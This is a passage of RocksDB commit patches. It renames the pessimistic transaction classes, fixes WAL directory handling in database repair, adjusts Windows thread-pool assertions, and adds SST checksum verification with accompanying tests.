WriteOptions& write_options, const TransactionOptions& txn_options); - virtual ~PessimisticTxn(); + virtual ~PessimisticTransaction(); void Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options); - Status Prepare() override = 0; + Status Prepare() override; - Status Commit() override = 0; + Status Commit() override; virtual Status CommitBatch(WriteBatch* batch) = 0; @@ -111,6 +110,12 @@ class PessimisticTxn : public TransactionBaseImpl { int64_t GetDeadlockDetectDepth() const { return deadlock_detect_depth_; } protected: + virtual Status PrepareInternal() = 0; + + virtual Status CommitWithoutPrepareInternal() = 0; + + virtual Status CommitInternal() = 0; + void Initialize(const TransactionOptions& txn_options); Status LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock); @@ -170,41 +175,43 @@ class PessimisticTxn : public TransactionBaseImpl { const Slice& key) override; // No copying allowed - PessimisticTxn(const PessimisticTxn&); - void operator=(const PessimisticTxn&); + PessimisticTransaction(const PessimisticTransaction&); + void operator=(const PessimisticTransaction&); }; -class WriteCommittedTxnImpl : public PessimisticTxn { +class WriteCommittedTxn : public PessimisticTransaction { public: - WriteCommittedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + WriteCommittedTxn(TransactionDB* db, const WriteOptions& write_options, const TransactionOptions& txn_options); - virtual ~WriteCommittedTxnImpl() {} - - Status Prepare() override; - - Status Commit() override; + virtual ~WriteCommittedTxn() {} Status CommitBatch(WriteBatch* batch) override; Status Rollback() override; private: + Status PrepareInternal() override; + + Status CommitWithoutPrepareInternal() override; + + Status CommitInternal() override; + Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, SequenceNumber prev_seqno, SequenceNumber* new_seqno); // No copying allowed - WriteCommittedTxnImpl(const WriteCommittedTxnImpl&); - void operator=(const WriteCommittedTxnImpl&); + WriteCommittedTxn(const WriteCommittedTxn&); + void operator=(const WriteCommittedTxn&); }; // Used at commit time to check whether transaction is committing before its // expiration time. class TransactionCallback : public WriteCallback { public: - explicit TransactionCallback(PessimisticTxn* txn) : txn_(txn) {} + explicit TransactionCallback(PessimisticTransaction* txn) : txn_(txn) {} - Status Callback(DB* db) override { + Status Callback(DB* /* unused */) override { if (txn_->IsExpired()) { return Status::Expired(); } else { @@ -215,7 +222,7 @@ class TransactionCallback : public WriteCallback { bool AllowWriteBatching() override { return true; } private: - PessimisticTxn* txn_; + PessimisticTransaction* txn_; }; } // namespace rocksdb diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 052dc80f730..9787d76df65 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -17,7 +17,7 @@ #include "rocksdb/utilities/transaction_db.h" #include "util/cast_util.h" #include "utilities/transactions/transaction_db_mutex_impl.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" namespace rocksdb { @@ -128,7 +128,7 @@ Transaction* WriteCommittedTxnDB::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new WriteCommittedTxnImpl(this, write_options, txn_options); + return new WriteCommittedTxn(this, write_options, txn_options); } } @@ -139,7 +139,7 @@ Transaction* WritePreparedTxnDB::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new WritePreparedTxnImpl(this, write_options, txn_options); + return new WritePreparedTxn(this, write_options, txn_options); } } @@ -301,18 +301,18 @@ Status PessimisticTransactionDB::DropColumnFamily( return s; } -Status PessimisticTransactionDB::TryLock(PessimisticTxn* txn, uint32_t cfh_id, +Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key, bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); } -void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, +void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys) { lock_mgr_.UnLock(txn, keys, GetEnv()); } -void PessimisticTransactionDB::UnLock(PessimisticTxn* txn, uint32_t cfh_id, +void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } @@ -409,7 +409,7 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock. @@ -423,7 +423,7 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, } void PessimisticTransactionDB::InsertExpirableTransaction(TransactionID tx_id, - PessimisticTxn* tx) { + PessimisticTransaction* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); @@ -442,14 +442,14 @@ bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks( if (tx_it == expirable_transactions_map_.end()) { return true; } - PessimisticTxn& tx = *(tx_it->second); + PessimisticTransaction& tx = *(tx_it->second); return tx.TryStealingLocks(); } void PessimisticTransactionDB::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = static_cast_with_check(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index d9cf7d55867..6ff1d015a80 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -15,9 +15,9 @@ #include "rocksdb/db.h" #include "rocksdb/options.h" #include "rocksdb/utilities/transaction_db.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" #include "utilities/transactions/transaction_lock_mgr.h" -#include "utilities/transactions/write_prepared_transaction_impl.h" +#include "utilities/transactions/write_prepared_txn.h" namespace rocksdb { @@ -64,11 +64,11 @@ class PessimisticTransactionDB : public TransactionDB { using StackableDB::DropColumnFamily; virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override; - Status TryLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key, + Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key, bool exclusive); - void UnLock(PessimisticTxn* txn, const TransactionKeyMap* keys); - void UnLock(PessimisticTxn* txn, uint32_t cfh_id, const std::string& key); + void UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys); + void UnLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key); void AddColumnFamily(const ColumnFamilyHandle* handle); @@ -79,7 +79,7 @@ class PessimisticTransactionDB : public TransactionDB { return txn_db_options_; } - void InsertExpirableTransaction(TransactionID tx_id, PessimisticTxn* tx); + void InsertExpirableTransaction(TransactionID tx_id, PessimisticTransaction* tx); void RemoveExpirableTransaction(TransactionID tx_id); // If transaction is no longer available, locks can be stolen @@ -116,7 +116,7 @@ class PessimisticTransactionDB : public TransactionDB { // that has started a commit. Only transactions with an expiration time // should be in this map. std::mutex map_mutex_; - std::unordered_map + std::unordered_map expirable_transactions_map_; // map from name to two phase transaction instance diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 95612cd3974..d93d5bcde77 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -227,7 +227,7 @@ bool TransactionLockMgr::IsLockExpired(TransactionID txn_id, return expired; } -Status TransactionLockMgr::TryLock(PessimisticTxn* txn, +Status TransactionLockMgr::TryLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive) { @@ -256,7 +256,7 @@ Status TransactionLockMgr::TryLock(PessimisticTxn* txn, // Helper function for TryLock(). Status TransactionLockMgr::AcquireWithTimeout( - PessimisticTxn* txn, LockMap* lock_map, LockMapStripe* stripe, + PessimisticTransaction* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info) { Status result; @@ -357,13 +357,13 @@ Status TransactionLockMgr::AcquireWithTimeout( } void TransactionLockMgr::DecrementWaiters( - const PessimisticTxn* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, const autovector& wait_ids) { std::lock_guard lock(wait_txn_map_mutex_); DecrementWaitersImpl(txn, wait_ids); } void TransactionLockMgr::DecrementWaitersImpl( - const PessimisticTxn* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, const autovector& wait_ids) { auto id = txn->GetID(); assert(wait_txn_map_.Contains(id)); wait_txn_map_.Delete(id); @@ -377,7 +377,7 @@ void TransactionLockMgr::DecrementWaitersImpl( } bool TransactionLockMgr::IncrementWaiters( - const PessimisticTxn* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, const autovector& wait_ids) { auto id = txn->GetID(); std::vector queue(txn->GetDeadlockDetectDepth()); std::lock_guard lock(wait_txn_map_mutex_); @@ -501,7 +501,7 @@ Status TransactionLockMgr::AcquireLocked(LockMap* lock_map, return result; } -void TransactionLockMgr::UnLockKey(const PessimisticTxn* txn, +void TransactionLockMgr::UnLockKey(const PessimisticTransaction* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env) { @@ -537,7 +537,7 @@ void TransactionLockMgr::UnLockKey(const PessimisticTxn* txn, } } -void TransactionLockMgr::UnLock(PessimisticTxn* txn, uint32_t column_family_id, +void TransactionLockMgr::UnLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env) { std::shared_ptr lock_map_ptr = GetLockMap(column_family_id); LockMap* lock_map = lock_map_ptr.get(); @@ -559,7 +559,7 @@ void TransactionLockMgr::UnLock(PessimisticTxn* txn, uint32_t column_family_id, stripe->stripe_cv->NotifyAll(); } -void TransactionLockMgr::UnLock(const PessimisticTxn* txn, +void TransactionLockMgr::UnLock(const PessimisticTransaction* txn, const TransactionKeyMap* key_map, Env* env) { for (auto& key_map_iter : *key_map) { uint32_t column_family_id = key_map_iter.first; diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 86a65783fdf..6e542071c15 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -17,7 +17,7 @@ #include "util/autovector.h" #include "util/hash_map.h" #include "util/thread_local.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" namespace rocksdb { @@ -47,14 +47,14 @@ class TransactionLockMgr { // Attempt to lock key. If OK status is returned, the caller is responsible // for calling UnLock() on this key. - Status TryLock(PessimisticTxn* txn, uint32_t column_family_id, + Status TryLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env, bool exclusive); // Unlock a key locked by TryLock(). txn must be the same Transaction that // locked this key. - void UnLock(const PessimisticTxn* txn, const TransactionKeyMap* keys, + void UnLock(const PessimisticTransaction* txn, const TransactionKeyMap* keys, Env* env); - void UnLock(PessimisticTxn* txn, uint32_t column_family_id, + void UnLock(PessimisticTransaction* txn, uint32_t column_family_id, const std::string& key, Env* env); using LockStatusData = std::unordered_multimap; @@ -102,7 +102,7 @@ class TransactionLockMgr { std::shared_ptr GetLockMap(uint32_t column_family_id); - Status AcquireWithTimeout(PessimisticTxn* txn, LockMap* lock_map, + Status AcquireWithTimeout(PessimisticTransaction* txn, LockMap* lock_map, LockMapStripe* stripe, uint32_t column_family_id, const std::string& key, Env* env, int64_t timeout, const LockInfo& lock_info); @@ -112,14 +112,14 @@ class TransactionLockMgr { const LockInfo& lock_info, uint64_t* wait_time, autovector* txn_ids); - void UnLockKey(const PessimisticTxn* txn, const std::string& key, + void UnLockKey(const PessimisticTransaction* txn, const std::string& key, LockMapStripe* stripe, LockMap* lock_map, Env* env); - bool IncrementWaiters(const PessimisticTxn* txn, + bool IncrementWaiters(const PessimisticTransaction* txn, const autovector& wait_ids); - void DecrementWaiters(const PessimisticTxn* txn, + void DecrementWaiters(const PessimisticTransaction* txn, const autovector& wait_ids); - void DecrementWaitersImpl(const PessimisticTxn* txn, + void DecrementWaitersImpl(const PessimisticTransaction* txn, const autovector& wait_ids); // No copying allowed diff --git a/utilities/transactions/write_prepared_transaction_impl.cc b/utilities/transactions/write_prepared_txn.cc similarity index 63% rename from utilities/transactions/write_prepared_transaction_impl.cc rename to utilities/transactions/write_prepared_txn.cc index c018e946047..f3942855bf2 100644 --- a/utilities/transactions/write_prepared_transaction_impl.cc +++ b/utilities/transactions/write_prepared_txn.cc @@ -5,56 +5,54 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/write_prepared_transaction_impl.h" +#include "utilities/transactions/write_prepared_txn.h" #include -#include -#include -#include #include "db/column_family.h" #include "db/db_impl.h" -#include "rocksdb/comparator.h" #include "rocksdb/db.h" -#include "rocksdb/snapshot.h" #include "rocksdb/status.h" #include "rocksdb/utilities/transaction_db.h" -#include "util/string_util.h" -#include "util/sync_point.h" #include "utilities/transactions/pessimistic_transaction_db.h" -#include "utilities/transactions/transaction_impl.h" -#include "utilities/transactions/transaction_util.h" +#include "utilities/transactions/pessimistic_transaction.h" namespace rocksdb { struct WriteOptions; -WritePreparedTxnImpl::WritePreparedTxnImpl( +WritePreparedTxn::WritePreparedTxn( TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) - : PessimisticTxn(txn_db, write_options, txn_options) { - PessimisticTxn::Initialize(txn_options); + : PessimisticTransaction(txn_db, write_options, txn_options) { + PessimisticTransaction::Initialize(txn_options); } -Status WritePreparedTxnImpl::CommitBatch(WriteBatch* batch) { +Status WritePreparedTxn::CommitBatch(WriteBatch* /* unused */) { // TODO(myabandeh) Implement this throw std::runtime_error("CommitBatch not Implemented"); return Status::OK(); } -Status WritePreparedTxnImpl::Prepare() { +Status WritePreparedTxn::PrepareInternal() { // TODO(myabandeh) Implement this throw std::runtime_error("Prepare not Implemented"); return Status::OK(); } -Status WritePreparedTxnImpl::Commit() { +Status WritePreparedTxn::CommitWithoutPrepareInternal() { // TODO(myabandeh) Implement this throw std::runtime_error("Commit not Implemented"); return Status::OK(); } -Status WritePreparedTxnImpl::Rollback() { +Status WritePreparedTxn::CommitInternal() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Commit not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxn::Rollback() { // TODO(myabandeh) Implement this throw std::runtime_error("Rollback not Implemented"); return Status::OK(); diff --git a/utilities/transactions/write_prepared_transaction_impl.h b/utilities/transactions/write_prepared_txn.h similarity index 77% rename from utilities/transactions/write_prepared_transaction_impl.h rename to utilities/transactions/write_prepared_txn.h index eab2b8669f7..c0feb2207e3 100644 --- a/utilities/transactions/write_prepared_transaction_impl.h +++ b/utilities/transactions/write_prepared_txn.h @@ -26,7 +26,7 @@ #include "rocksdb/utilities/write_batch_with_index.h" #include "util/autovector.h" #include "utilities/transactions/transaction_base.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" #include "utilities/transactions/transaction_util.h" namespace rocksdb { @@ -35,24 +35,26 @@ class TransactionDBImpl; // This impl could write to DB also uncomitted data and then later tell apart // committed data from uncomitted data. Uncommitted data could be after the -// Prepare phase in 2PC (WritePreparedTxnImpl) or before that +// Prepare phase in 2PC (WritePreparedTxn) or before that // (WriteUnpreparedTxnImpl). -class WritePreparedTxnImpl : public PessimisticTxn { +class WritePreparedTxn : public PessimisticTransaction { public: - WritePreparedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + WritePreparedTxn(TransactionDB* db, const WriteOptions& write_options, const TransactionOptions& txn_options); - virtual ~WritePreparedTxnImpl() {} - - Status Prepare() override; - - Status Commit() override; + virtual ~WritePreparedTxn() {} Status CommitBatch(WriteBatch* batch) override; Status Rollback() override; private: + Status PrepareInternal() override; + + Status CommitWithoutPrepareInternal() override; + + Status CommitInternal() override; + // TODO(myabandeh): verify that the current impl work with values being // written with prepare sequence number too. // Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& @@ -61,8 +63,8 @@ class WritePreparedTxnImpl : public PessimisticTxn { // new_seqno); // No copying allowed - WritePreparedTxnImpl(const WritePreparedTxnImpl&); - void operator=(const WritePreparedTxnImpl&); + WritePreparedTxn(const WritePreparedTxn&); + void operator=(const WritePreparedTxn&); }; } // namespace rocksdb From 36375de76fb2b5a43d33154d0754551b1f71544f Mon Sep 17 00:00:00 2001 From: James Page Date: Tue, 8 Aug 2017 08:45:28 -0700 Subject: [PATCH 085/205] gcc-7/i386: markup intentional fallthroughs Summary: Markup i386 code paths resolving compilation failure under i386 with gcc-7. Signed-off-by: James Page Closes https://github.com/facebook/rocksdb/pull/2700 Differential Revision: D5583047 Pulled By: maysamyabandeh fbshipit-source-id: fe31bcfeaf7cd2d3f51b55f5ae0b3b0cb3788fbc --- util/murmurhash.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/util/murmurhash.cc b/util/murmurhash.cc index 334ed898ea1..4d71d589080 100644 --- a/util/murmurhash.cc +++ b/util/murmurhash.cc @@ -113,8 +113,8 @@ unsigned int MurmurHash2 ( const void * key, int len, unsigned int seed ) switch(len) { - case 3: h ^= data[2] << 16; - case 2: h ^= data[1] << 8; + case 3: h ^= data[2] << 16; // fallthrough + case 2: h ^= data[1] << 8; // fallthrough case 1: h ^= data[0]; h *= m; }; From d97a72d63fb763ff0dfd11f610b3877180f3e99e Mon Sep 17 00:00:00 2001 From: Chang Liu Date: Tue, 8 Aug 2017 10:42:38 -0700 Subject: [PATCH 086/205] Try to repair db with wal_dir option, avoid leak some WAL files Summary: We should search wal_dir in Repairer::FindFiles function, and avoid use LogFileNmae(dbname, number) to get WAL file's name, which will get a wrong WAL filename. as following: ``` [WARN] [/home/liuchang/Workspace/rocksdb/db/repair.cc:310] Log #3: ignoring conversion error: IO error: While opening a file for sequentially reading: /tmp/rocksdbtest-1000/repair_test/000003.log: No such file or directory ``` I have added a new test case to repair_test.cc, which try to repair db with all WAL options. Signed-off-by: Chang Liu Closes https://github.com/facebook/rocksdb/pull/2692 Differential Revision: D5575888 Pulled By: ajkr fbshipit-source-id: 5b93e9f85cddc01663ccecd87631fa723ac466a3 --- db/db_impl.cc | 2 +- db/repair.cc | 22 +++++++++++++++++----- db/repair_test.cc | 34 ++++++++++++++++++++++++++++++++++ 3 files changed, 52 insertions(+), 6 deletions(-) diff --git a/db/db_impl.cc b/db/db_impl.cc index 86bb4a43381..5abd632c03f 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -2298,7 +2298,7 @@ Status DestroyDB(const std::string& dbname, const Options& options) { // Delete log files in the WAL dir for (const auto& file : walDirFiles) { if (ParseFileName(file, &number, &type) && type == kLogFile) { - Status del = env->DeleteFile(soptions.wal_dir + "/" + file); + Status del = env->DeleteFile(LogFileName(soptions.wal_dir, number)); if (result.ok() && !del.ok()) { result = del; } diff --git a/db/repair.cc b/db/repair.cc index c248e6f43c4..9ed326032cb 100644 --- a/db/repair.cc +++ b/db/repair.cc @@ -176,6 +176,7 @@ class Repairer { status = db_impl->NewDB(); delete db_impl; } + if (status.ok()) { // Recover using the fresh manifest created by NewDB() status = @@ -246,9 +247,21 @@ class Repairer { Status FindFiles() { std::vector filenames; bool found_file = false; + std::vector to_search_paths; + for (size_t path_id = 0; path_id < db_options_.db_paths.size(); path_id++) { + to_search_paths.push_back(db_options_.db_paths[path_id].path); + } + + // search wal_dir if user uses a customize wal_dir + if (!db_options_.wal_dir.empty() && + db_options_.wal_dir != dbname_) { + to_search_paths.push_back(db_options_.wal_dir); + } + + for (size_t path_id = 0; path_id < to_search_paths.size(); path_id++) { Status status = - env_->GetChildren(db_options_.db_paths[path_id].path, &filenames); + env_->GetChildren(to_search_paths[path_id], &filenames); if (!status.ok()) { return status; } @@ -261,14 +274,12 @@ class Repairer { for (size_t i = 0; i < filenames.size(); i++) { if (ParseFileName(filenames[i], &number, &type)) { if (type == kDescriptorFile) { - assert(path_id == 0); manifests_.push_back(filenames[i]); } else { if (number + 1 > next_file_number_) { next_file_number_ = number + 1; } if (type == kLogFile) { - assert(path_id == 0); logs_.push_back(number); } else if (type == kTableFile) { table_fds_.emplace_back(number, static_cast(path_id), @@ -288,7 +299,8 @@ class Repairer { void ConvertLogFilesToTables() { for (size_t i = 0; i < logs_.size(); i++) { - std::string logname = LogFileName(dbname_, logs_[i]); + // we should use LogFileName(wal_dir, logs_[i]) here. user might uses wal_dir option. + std::string logname = LogFileName(db_options_.wal_dir, logs_[i]); Status status = ConvertLogToTable(logs_[i]); if (!status.ok()) { ROCKS_LOG_WARN(db_options_.info_log, @@ -312,7 +324,7 @@ class Repairer { }; // Open the log file - std::string logname = LogFileName(dbname_, log); + std::string logname = LogFileName(db_options_.wal_dir, log); unique_ptr lfile; Status status = env_->NewSequentialFile( logname, &lfile, env_->OptimizeForLogRead(env_options_)); diff --git a/db/repair_test.cc b/db/repair_test.cc index 226e4e6d063..b267c6d1683 100644 --- a/db/repair_test.cc +++ b/db/repair_test.cc @@ -174,6 +174,40 @@ TEST_F(RepairTest, UnflushedSst) { ASSERT_EQ(Get("key"), "val"); } +TEST_F(RepairTest, SeparateWalDir) { + do { + Options options = CurrentOptions(); + DestroyAndReopen(options); + Put("key", "val"); + Put("foo", "bar"); + VectorLogPtr wal_files; + ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files)); + ASSERT_EQ(wal_files.size(), 1); + uint64_t total_ssts_size; + GetAllSSTFiles(&total_ssts_size); + ASSERT_EQ(total_ssts_size, 0); + std::string manifest_path = + DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo()); + + Close(); + ASSERT_OK(env_->FileExists(manifest_path)); + ASSERT_OK(env_->DeleteFile(manifest_path)); + ASSERT_OK(RepairDB(dbname_, options)); + + // make sure that all WALs are converted to SSTables. + options.wal_dir = ""; + + Reopen(options); + ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files)); + ASSERT_EQ(wal_files.size(), 0); + GetAllSSTFiles(&total_ssts_size); + ASSERT_GT(total_ssts_size, 0); + ASSERT_EQ(Get("key"), "val"); + ASSERT_EQ(Get("foo"), "bar"); + + } while(ChangeWalOptions()); +} + TEST_F(RepairTest, RepairMultipleColumnFamilies) { // Verify repair logic associates SST files with their original column // families. From 47ed3bfc3b897114172b39571235069fe8feaa33 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 8 Aug 2017 17:16:14 -0700 Subject: [PATCH 087/205] fix WinEnv assertions Summary: Closes https://github.com/facebook/rocksdb/pull/2702 Differential Revision: D5585389 Pulled By: ajkr fbshipit-source-id: cb54041eb481d0d759c440f82a8a2c5b34534173 --- port/win/env_win.cc | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/port/win/env_win.cc b/port/win/env_win.cc index 1e7ea0cb8dc..462148893b3 100644 --- a/port/win/env_win.cc +++ b/port/win/env_win.cc @@ -829,7 +829,7 @@ WinEnvThreads::~WinEnvThreads() { void WinEnvThreads::Schedule(void(*function)(void*), void* arg, Env::Priority pri, void* tag, void(*unschedFunction)(void* arg)) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); thread_pools_[pri].Schedule(function, arg, tag, unschedFunction); } @@ -878,7 +878,7 @@ void WinEnvThreads::WaitForJoin() { } unsigned int WinEnvThreads::GetThreadPoolQueueLen(Env::Priority pri) const { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); return thread_pools_[pri].GetQueueLen(); } @@ -894,17 +894,17 @@ void WinEnvThreads::SleepForMicroseconds(int micros) { } void WinEnvThreads::SetBackgroundThreads(int num, Env::Priority pri) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); thread_pools_[pri].SetBackgroundThreads(num); } int WinEnvThreads::GetBackgroundThreads(Env::Priority pri) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); return thread_pools_[pri].GetBackgroundThreads(); } void WinEnvThreads::IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); thread_pools_[pri].IncBackgroundThreadsIfNeeded(num); } From 7848f0b24c91637a771b73a78ddbc2d638c65fa3 Mon Sep 17 00:00:00 2001 From: Aaron G Date: Wed, 9 Aug 2017 15:49:40 -0700 Subject: [PATCH 088/205] add VerifyChecksum() to db.h Summary: We need a tool to check any sst file corruption in the db. It will check all the sst files in current version and read all the blocks (data, meta, index) with checksum verification. If any verification fails, the function will return non-OK status. Closes https://github.com/facebook/rocksdb/pull/2498 Differential Revision: D5324269 Pulled By: lightmark fbshipit-source-id: 6f8a272008b722402a772acfc804524c9d1a483b --- db/convenience.cc | 29 +++++++++++++ db/corruption_test.cc | 10 +++++ db/db_impl.cc | 50 +++++++++++++++++++++ db/db_impl.h | 2 + db/db_test.cc | 4 ++ include/rocksdb/convenience.h | 5 +++ include/rocksdb/db.h | 2 + include/rocksdb/utilities/stackable_db.h | 2 + table/block_based_table_reader.cc | 55 +++++++++++++++++++++++- table/block_based_table_reader.h | 4 ++ table/table_reader.h | 5 +++ tools/sst_dump_tool.cc | 18 +++++++- tools/sst_dump_tool_imp.h | 1 + 13 files changed, 185 insertions(+), 2 deletions(-) diff --git a/db/convenience.cc b/db/convenience.cc index e3e7165b463..8ee31cacab5 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -24,6 +24,35 @@ Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family, ->DeleteFilesInRange(column_family, begin, end); } +Status VerifySstFileChecksum(const Options& options, + const EnvOptions& env_options, + const std::string& file_path) { + unique_ptr file; + uint64_t file_size; + InternalKeyComparator internal_comparator(options.comparator); + ImmutableCFOptions ioptions(options); + + Status s = ioptions.env->NewRandomAccessFile(file_path, &file, env_options); + if (s.ok()) { + s = ioptions.env->GetFileSize(file_path, &file_size); + } else { + return s; + } + unique_ptr table_reader; + std::unique_ptr file_reader( + new RandomAccessFileReader(std::move(file), file_path)); + s = ioptions.table_factory->NewTableReader( + TableReaderOptions(ioptions, env_options, internal_comparator, + false /* skip_filters */, -1 /* level */), + std::move(file_reader), file_size, &table_reader, + false /* prefetch_index_and_filter_in_cache */); + if (!s.ok()) { + return s; + } + s = table_reader->VerifyChecksum(); + return s; +} + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/db/corruption_test.cc b/db/corruption_test.cc index 9f423757959..608c88d597d 100644 --- a/db/corruption_test.cc +++ b/db/corruption_test.cc @@ -20,6 +20,7 @@ #include "db/log_format.h" #include "db/version_set.h" #include "rocksdb/cache.h" +#include "rocksdb/convenience.h" #include "rocksdb/env.h" #include "rocksdb/table.h" #include "rocksdb/write_batch.h" @@ -179,6 +180,9 @@ class CorruptionTest : public testing::Test { } s = WriteStringToFile(Env::Default(), contents, fname); ASSERT_TRUE(s.ok()) << s.ToString(); + Options options; + EnvOptions env_options; + ASSERT_NOK(VerifySstFileChecksum(options, env_options, fname)); } void Corrupt(FileType filetype, int offset, int bytes_to_corrupt) { @@ -312,6 +316,7 @@ TEST_F(CorruptionTest, TableFile) { Corrupt(kTableFile, 100, 1); Check(99, 99); + ASSERT_NOK(dbi->VerifyChecksum()); } TEST_F(CorruptionTest, TableFileIndexData) { @@ -330,6 +335,7 @@ TEST_F(CorruptionTest, TableFileIndexData) { // one full file should be readable, since only one was corrupted // the other file should be fully non-readable, since index was corrupted Check(5000, 5000); + ASSERT_NOK(dbi->VerifyChecksum()); } TEST_F(CorruptionTest, MissingDescriptor) { @@ -389,10 +395,12 @@ TEST_F(CorruptionTest, CompactionInputError) { Corrupt(kTableFile, 100, 1); Check(9, 9); + ASSERT_NOK(dbi->VerifyChecksum()); // Force compactions by writing lots of values Build(10000); Check(10000, 10000); + ASSERT_NOK(dbi->VerifyChecksum()); } TEST_F(CorruptionTest, CompactionInputErrorParanoid) { @@ -424,6 +432,7 @@ TEST_F(CorruptionTest, CompactionInputErrorParanoid) { CorruptTableFileAtLevel(0, 100, 1); Check(9, 9); + ASSERT_NOK(dbi->VerifyChecksum()); // Write must eventually fail because of corrupted table Status s; @@ -445,6 +454,7 @@ TEST_F(CorruptionTest, UnrelatedKeys) { DBImpl* dbi = reinterpret_cast(db_); dbi->TEST_FlushMemTable(); Corrupt(kTableFile, 100, 1); + ASSERT_NOK(dbi->VerifyChecksum()); std::string tmp1, tmp2; ASSERT_OK(db_->Put(WriteOptions(), Key(1000, &tmp1), Value(1000, &tmp2))); diff --git a/db/db_impl.cc b/db/db_impl.cc index 5abd632c03f..cdba03915af 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -67,6 +67,7 @@ #include "port/port.h" #include "rocksdb/cache.h" #include "rocksdb/compaction_filter.h" +#include "rocksdb/convenience.h" #include "rocksdb/db.h" #include "rocksdb/env.h" #include "rocksdb/merge_operator.h" @@ -80,6 +81,7 @@ #include "table/merging_iterator.h" #include "table/table_builder.h" #include "table/two_level_iterator.h" +#include "tools/sst_dump_tool_imp.h" #include "util/auto_roll_logger.h" #include "util/autovector.h" #include "util/build_version.h" @@ -2740,6 +2742,54 @@ Status DBImpl::IngestExternalFile( return status; } +Status DBImpl::VerifyChecksum() { + Status s; + Options options; + 